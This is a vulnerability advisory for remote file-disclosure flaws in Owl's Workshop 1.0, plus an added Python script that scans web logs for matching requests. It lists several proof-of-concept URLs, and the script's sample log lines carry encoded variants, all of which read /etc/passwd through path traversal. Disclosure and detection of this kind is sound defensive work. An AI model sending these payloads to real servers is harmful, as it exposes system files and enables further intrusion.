Owl's Workshop Multiple Remote File Disclosure Vulnerabilities
BID:9689
Info
| Bugtraq ID: | 9689 |
| Class: | Input Validation Error |
| CVE: | CVE-2004-0302, CVE-2004-0303 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 18 2004 12:00AM |
| Updated: | Apr 05 2007 03:22AM |
| Credit: | Disclosure of this issue has been credited to G00db0y. |
| Vulnerable: | Fool's Workshop Owl's Workshop 1.0 |
| Not Vulnerable: | |
Discussion
Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter.
Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.
Exploit / POC
The following proofs of concept have been provided:
http://www.example.org/owls/glossaries/index.php?file=/etc/passwd
http://www.example.org/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print
http://www.example.org/owls/readings/index.php?filename=/etc/passwd
http://www.example.org/owls/multiplechoice/resultsignore.php?filename=/etc/passwd
http://www.example.org/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd
http://www.example.org/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
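With no vendor patch listed, reviewing web server access logs for requests of the kind shown in the proofs of concept is one way to check for exposure. The following is an added example, not part of the original advisory: it flags requests whose file, filename or editfile parameter carries an absolute path or a directory traversal sequence. The "combined" log format, the /owls/ install prefix and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names taken from the advisory's proof-of-concept URLs.
FILE_PARAMS = {"file", "filename", "editfile"}
# Assumption: Apache/nginx "combined" log format; only the request line is used.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def path_escape_reason(value):
    """Return why a file parameter value leaves the expected directory, or None."""
    # parse_qsl already decoded once; decode again to catch double encoding.
    decoded = unquote(value).replace("\\", "/")
    if decoded.startswith("/"):
        return "absolute path"
    if ".." in decoded.split("/"):
        return "directory traversal"
    return None


def scan(lines, app_prefix="/owls/"):
    """Return (line_no, parameter, value, reason) for each suspicious request."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.startswith(app_prefix):  # assumed install path
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() not in FILE_PARAMS:
                continue
            reason = path_escape_reason(value)
            if reason:
                findings.append((line_no, name, value, reason))
    return findings


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Feb/2004:10:00:01 +0000] "GET /owls/glossaries/index.php?file=/etc/passwd HTTP/1.1" 200 1432',
    '192.0.2.10 - - [18/Feb/2004:10:00:02 +0000] "GET /owls/multiplechoice/index.php?file=..%2F..%2F..%2Fetc%2Fpasswd&view=print HTTP/1.1" 200 1432',
    '198.51.100.7 - - [18/Feb/2004:10:05:00 +0000] "GET /owls/glossaries/index.php?file=biology.txt HTTP/1.1" 200 812',
    '192.0.2.10 - - [18/Feb/2004:10:06:00 +0000] "GET /owls/workshop/glossary.php?editfile=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1432',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Parameters submitted in a POST body do not appear in access logs, so this check covers only values passed in the URI.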
References
References:
- Owl's Workshop Product Page (Fool's Workshop)
- ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files retrieving (ZetaLabs)